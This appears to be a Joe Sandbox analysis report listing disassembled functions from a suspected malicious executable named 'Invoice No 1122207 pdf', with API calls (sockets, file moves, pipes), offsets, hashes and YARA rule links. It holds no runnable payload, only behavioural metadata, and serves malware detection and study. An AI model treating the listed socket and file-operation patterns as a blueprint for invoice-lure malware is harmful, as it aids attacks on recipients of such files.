Opcode ID: 6c3b504252f4563d54bb1c869af65293ee7305c5de8bb617e74c4d8021c1d268
Instruction ID: 0bbb919b1a8013fc562e5559fa36ea9a63a4bb6e9823816ce019a46bd98018ea
Opcode Fuzzy Hash: 6c3b504252f4563d54bb1c869af65293ee7305c5de8bb617e74c4d8021c1d268
Instruction Fuzzy Hash: A951E6A15447D13DFB3283248C45BFF7E995B86300F08C88AE0DD469C2C298ECA8D75A

Function 0044542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00453CD6,?,?,?,?,?,?,?,?,00445BA3,?,?,00453CD6,?,?), ref: 00445470
__fassign.LIBCMT ref: 004454EB
__fassign.LIBCMT ref: 00445506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00453CD6,00000005,00000000,00000000), ref: 0044552C
WriteFile.KERNEL32(?,00453CD6,00000000,00445BA3,00000000,?,?,?,?,?,?,?,?,?,00445BA3,?), ref: 0044554B
WriteFile.KERNEL32(?,?,00000001,00445BA3,00000000,?,?,?,?,?,?,?,?,?,00445BA3,?), ref: 00445584

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 7be974b27e3db8dce4288a28fe535950d8195cfebf89370f4fd5ac15572036ee
Instruction ID: 3a8be8e9041603259f37193ebde6c42580a139486c5335926ac659f1848a661e
Opcode Fuzzy Hash: 7be974b27e3db8dce4288a28fe535950d8195cfebf89370f4fd5ac15572036ee
Instruction Fuzzy Hash: 3751E770A00649AFEF11CFA8D885AEEBBF5EF09300F14412BF555E7292D7749A41CB68

Function 004910B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0049304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0049307A
Part of subcall function 0049304E: _wcslen.LIBCMT ref: 0049309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00491112
WSAGetLastError.WSOCK32 ref: 00491121
WSAGetLastError.WSOCK32 ref: 004911C9
closesocket.WSOCK32(00000000), ref: 004911F9

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: b7f5be6981453c93e9ec974bea7938a17b159b6a8a173b8e965b638d6c3ddd39
Instruction ID: 9765d20cc8d782846dd36171b63127cfe19ab6084df616b64c42d05d81aaa42c
Opcode Fuzzy Hash: b7f5be6981453c93e9ec974bea7938a17b159b6a8a173b8e965b638d6c3ddd39
Instruction Fuzzy Hash: 2341F731600105AFDB109F14C885BAABFE9FF45358F14806AF9159B3A1C778ED81CBE9

Function 0047CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0047DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0047CF22,?), ref: 0047DDFD

Part of subcall function 0047DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0047CF22,?), ref: 0047DE16

lstrcmpiW.KERNEL32(?,?), ref: 0047CF45
MoveFileW.KERNEL32(?,?), ref: 0047CF7F
_wcslen.LIBCMT ref: 0047D005
_wcslen.LIBCMT ref: 0047D01B
SHFileOperationW.SHELL32(?), ref: 0047D061

Strings

\*.*, xrefs: 0047CFF3

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: ea7aaee4bb65b9023bf253f8f1b58c730dbd05a8ed5844d8ed304367de8f7389
Instruction ID: 0a0c3ffc89610867f98d1ace412faacb9624685888a867e35375af47558ba2bc
Opcode Fuzzy Hash: ea7aaee4bb65b9023bf253f8f1b58c730dbd05a8ed5844d8ed304367de8f7389
Instruction Fuzzy Hash: 8F415771D451185EDF12EFA5C9C1BDE77B8AF09384F1040EBE509EB141EA38A644CB58

Function 004A2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004A2E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 004A2E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 004A2E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 004A2EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004A2EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 004A2EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004A2F0B

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: afcbe08b7f12ab77c33aea948100070413457703b78f4eda8510633d1e4fc66f
Instruction ID: 09217e66e949798d80aafdba6fd8cf359fa017d9f37003bb1065f243eb873d51
Opcode Fuzzy Hash: afcbe08b7f12ab77c33aea948100070413457703b78f4eda8510633d1e4fc66f
Instruction Fuzzy Hash: 9131F430645150AFDB21CF5CDDC4F6637E1EB6A710F150166F9048F2B2CBB5A880EB49

Function 00477726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00477769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0047778F
SysAllocString.OLEAUT32(00000000), ref: 00477792
SysAllocString.OLEAUT32(?), ref: 004777B0
SysFreeString.OLEAUT32(?), ref: 004777B9
StringFromGUID2.OLE32(?,?,00000028), ref: 004777DE
SysAllocString.OLEAUT32(?), ref: 004777EC

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 8c7e213ac43fc434f7926aae4637ec3ee25c5ec58bbd6fb59048a12f6509569a
Instruction ID: 1907a6c854d28df787dbcbc206c865ff6f7debe4ef7c476506690dd4b1d39068
Opcode Fuzzy Hash: 8c7e213ac43fc434f7926aae4637ec3ee25c5ec58bbd6fb59048a12f6509569a
Instruction Fuzzy Hash: 6221B276604219AFDB14DFA8DC88CFB77ECEB093647408436F908DB250D674EC468B68

Function 004777FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00477842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00477868
SysAllocString.OLEAUT32(00000000), ref: 0047786B
SysAllocString.OLEAUT32 ref: 0047788C
SysFreeString.OLEAUT32 ref: 00477895
StringFromGUID2.OLE32(?,?,00000028), ref: 004778AF
SysAllocString.OLEAUT32(?), ref: 004778BD

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 7b4aed2eb55f88c131e6dbfff4b38739a106481fa55fef262260097216832b2f
Instruction ID: 7b05e49c742221ac8033265a869f9c6274cf91dd368ec5728a39e532596ed145
Opcode Fuzzy Hash: 7b4aed2eb55f88c131e6dbfff4b38739a106481fa55fef262260097216832b2f
Instruction Fuzzy Hash: 6D216231604114AFDB10AFA8DC88DBB7BECEB097607518126F919CB2A1D678DC45CB6D

Function 004804D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 004804F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0048052E

Strings

nul, xrefs: 00480567

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 75f099e1712beaf22993d6797736cfda6e356f7bed940b78d76a406d5909e4f5
Instruction ID: 9a48228d481c7bd7bb189645c54176b79ad7b283bab6f5613cb5bd11d2649014
Opcode Fuzzy Hash: 75f099e1712beaf22993d6797736cfda6e356f7bed940b78d76a406d5909e4f5
Instruction Fuzzy Hash: 95216D75610305AFDB60EF29DC44A9E7BE4AF45724F204E2AF8A1D62E0D7749948CF38

Function 004805A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 004805C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00480601

Strings

nul, xrefs: 00480639

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: b2f9696a9f57c13ff0eea99611995276ab9cdec46da63bd1386f26d5c8e4c062
Instruction ID: d726e9dae3363738ef992d0155cfbe510bd649dfe070012dba31d1431b556c8d
Opcode Fuzzy Hash: b2f9696a9f57c13ff0eea99611995276ab9cdec46da63bd1386f26d5c8e4c062
Instruction Fuzzy Hash: 39219135510305AFDB60AF698C44A5F77E4AF85720F200F2AE8A1E33E0E7749864CB28

Function 004A40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0041604C
Part of subcall function 0041600E: GetStockObject.GDI32(00000011), ref: 00416060
Part of subcall function 0041600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0041606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 004A4112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 004A411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004A412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 004A4139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 004A4145

Strings

Msctls_Progress32, xrefs: 004A40E3

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: eb2e48e241f30cabd6ad8765c96a960efee5f0007c069f28fc0c94112b3dec4a
Instruction ID: c9d7ba6ed7162725d3ced616448d1b5bbf84ed62faece9bae52646308c077414
Opcode Fuzzy Hash: eb2e48e241f30cabd6ad8765c96a960efee5f0007c069f28fc0c94112b3dec4a
Instruction Fuzzy Hash: 3311E6B11401197EEF108F64CC85EEB7F5DEF59398F004111B618A6150C776DC61DBA8

Function 0044D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0044D7A3: _free.LIBCMT ref: 0044D7CC

_free.LIBCMT ref: 0044D82D

Part of subcall function 004429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0044D7D1,00000000,00000000,00000000,00000000,?,0044D7F8,00000000,00000007,00000000,?,0044DBF5,00000000), ref: 004429DE
Part of subcall function 004429C8: GetLastError.KERNEL32(00000000,?,0044D7D1,00000000,00000000,00000000,00000000,?,0044D7F8,00000000,00000007,00000000,?,0044DBF5,00000000,00000000), ref: 004429F0

_free.LIBCMT ref: 0044D838
_free.LIBCMT ref: 0044D843
_free.LIBCMT ref: 0044D897
_free.LIBCMT ref: 0044D8A2
_free.LIBCMT ref: 0044D8AD
_free.LIBCMT ref: 0044D8B8

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: c377767b27301cc4aad4fa5b422dd55e7ddbb0a192f5bf0fcbcedc779b9b7479
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 671121B1A40B04ABF921BFB2CC47FCB7BDC6F04704F80482EB299A6692DA7DB5054654

Function 0047DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0047DA74
LoadStringW.USER32(00000000), ref: 0047DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0047DA91
LoadStringW.USER32(00000000), ref: 0047DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0047DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0047DAB9

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 9ae9e66c017f939920714558eb0fecf04ebc3d6516ba418c19b3f3a1a321dd28
Instruction ID: a1da462aa9e4c506d35bab5c7eaf66fe5d3b49265c8d1cd150d4c48e4bf2559b
Opcode Fuzzy Hash: 9ae9e66c017f939920714558eb0fecf04ebc3d6516ba418c19b3f3a1a321dd28
Instruction Fuzzy Hash: 1B0186F69002087FE750DBA09DC9EE7376CEB09301F4044A6F70AE2041EA749E844F78

Function 0048096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(00E4E170,00E4E170), ref: 0048097B
EnterCriticalSection.KERNEL32(00E4E150,00000000), ref: 0048098D
TerminateThread.KERNEL32(6F646E69,000001F6), ref: 0048099B
WaitForSingleObject.KERNEL32(6F646E69,000003E8), ref: 004809A9
CloseHandle.KERNEL32(6F646E69), ref: 004809B8
InterlockedExchange.KERNEL32(00E4E170,000001F6), ref: 004809C8
LeaveCriticalSection.KERNEL32(00E4E150), ref: 004809CF

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 90215555e3ef42918418173c8ab6f3141c7f7e97d37f10a1312a54bc034fafd1
Instruction ID: 79c4584fa51b4a0e3771378881f3d9c5bd24afcb0b8ee26a218ab75ad849665e
Opcode Fuzzy Hash: 90215555e3ef42918418173c8ab6f3141c7f7e97d37f10a1312a54bc034fafd1
Instruction Fuzzy Hash: EEF03172542502BBD7815F94EECCBDA7F35FF02702F401026F101508A0CB749465CF98

Function 00491C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00491DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00491DE1
WSAGetLastError.WSOCK32 ref: 00491DF2
htons.WSOCK32(?,?,?,?,?), ref: 00491EDB
inet_ntoa.WSOCK32(?), ref: 00491E8C

Part of subcall function 004739E8: _strlen.LIBCMT ref: 004739F2

Part of subcall function 00493224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0048EC0C), ref: 00493240

_strlen.LIBCMT ref: 00491F35

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: bbcf097ad8c3ab62b9c3f1ff6f5e53a8bfa3333e8c8c849fa29943871555d001
Instruction ID: 3f16cbace0477e478eccabfe3b91f0a5ccb8d7982bd02e61bfee587c1a98ea02
Opcode Fuzzy Hash: bbcf097ad8c3ab62b9c3f1ff6f5e53a8bfa3333e8c8c849fa29943871555d001
Instruction Fuzzy Hash: 14B1F231204301AFC724EF25C885E6A7BE5AF84318F54856EF4564B3E2DB39ED42CB95

Function 00415D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00415D30
GetWindowRect.USER32(?,?), ref: 00415D71
ScreenToClient.USER32(?,?), ref: 00415D99
GetClientRect.USER32(?,?), ref: 00415ED7
GetWindowRect.USER32(?,?), ref: 00415EF8

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 9a7bbd2ee61cc26cc93447fe43f975dc4a29f2f7d440b0fa1e3f85092c77c0b6
Instruction ID: 58ba3854c76b15d91ee6a1e7bd697758bdfb85b9c9fc66b20e6df40114c91a6d
Opcode Fuzzy Hash: 9a7bbd2ee61cc26cc93447fe43f975dc4a29f2f7d440b0fa1e3f85092c77c0b6
Instruction Fuzzy Hash: B7B17B78A0074ADBDB10DFA9C4807EEB7F1FF94310F14841AE8A9D7250D738AA91DB59

Function 004401B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 004400BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004400D6
__allrem.LIBCMT ref: 004400ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0044010B
__allrem.LIBCMT ref: 00440122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00440140

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: a7bc3b624c1f6bf048d3cb5a78ab0417a2618118eb77044d913ecf2298be7943
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: 3681F572A007069BF720AE2ACC41B6B73E8AF55328F24453FF951D7781E779D9048B98

Function 004461FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,004382D9,004382D9,?,?,?,0044644F,00000001,00000001,8BE85006), ref: 00446258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0044644F,00000001,00000001,8BE85006,?,?,?), ref: 004462DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004463D8
__freea.LIBCMT ref: 004463E5

Part of subcall function 00443820: RtlAllocateHeap.NTDLL(00000000,?,004E1444,?,0042FDF5,?,?,0041A976,00000010,004E1440,004113FC,?,004113C6,?,00411129), ref: 00443852

__freea.LIBCMT ref: 004463EE
__freea.LIBCMT ref: 00446413

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
